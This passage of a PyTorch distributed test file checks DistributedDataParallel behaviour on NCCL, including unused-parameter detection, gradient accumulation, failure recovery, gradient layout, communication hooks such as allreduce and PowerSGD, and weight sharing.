torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First, test that finding unused parameters under these conditions triggers
# an error when `backward` is called (because fc3 is treated as an unused
# parameter and is therefore marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement gradient accumulation, but
# we want to make sure DDP does not interfere with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradient synchronization by stepping the wrapped module directly
# (prepare_for_backward is never called).
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Need to create a separate file for the recovered FileStore, because
# the original one will be deleted when the first FileStore is destructed.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to construct this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
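# Average the bucket (divide by world_size) before the allreduce so the hook
# reproduces DDP's default gradient averaging; the then-callback unwraps the
# single reduced tensor from the future's value.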
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run a plain model with the allreduce hook and a separate optimizer step,
# then verify the resulting parameters match the hook-fused optimizer run.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
mapping = {v: k for k, v in functional_optim_map.items()}
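# functional_optim_map maps each torch.optim class to its functional
# counterpart; invert it to recover the regular optimizer class for the
# reference run.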
sgd = mapping.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adamw_nccl(self):
adamw_lr = 1e-2
adamw_betas = (0.9, 0.99)
adamw_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdamW,
adamw_lr,
betas=adamw_betas,
eps=adamw_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
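# Net effect: the averaged allreduce result is multiplied by 10 and then
# halved, i.e. 5x what a plain allreduce hook would produce.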
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multiplied by 5.
# without the comm_hook, the result would still be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
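# The same Parameter instance is shared by both AcceptsParam layers below,
# so its gradient accumulates contributions from both uses in every forward.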
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for DDP with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are adapted from
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
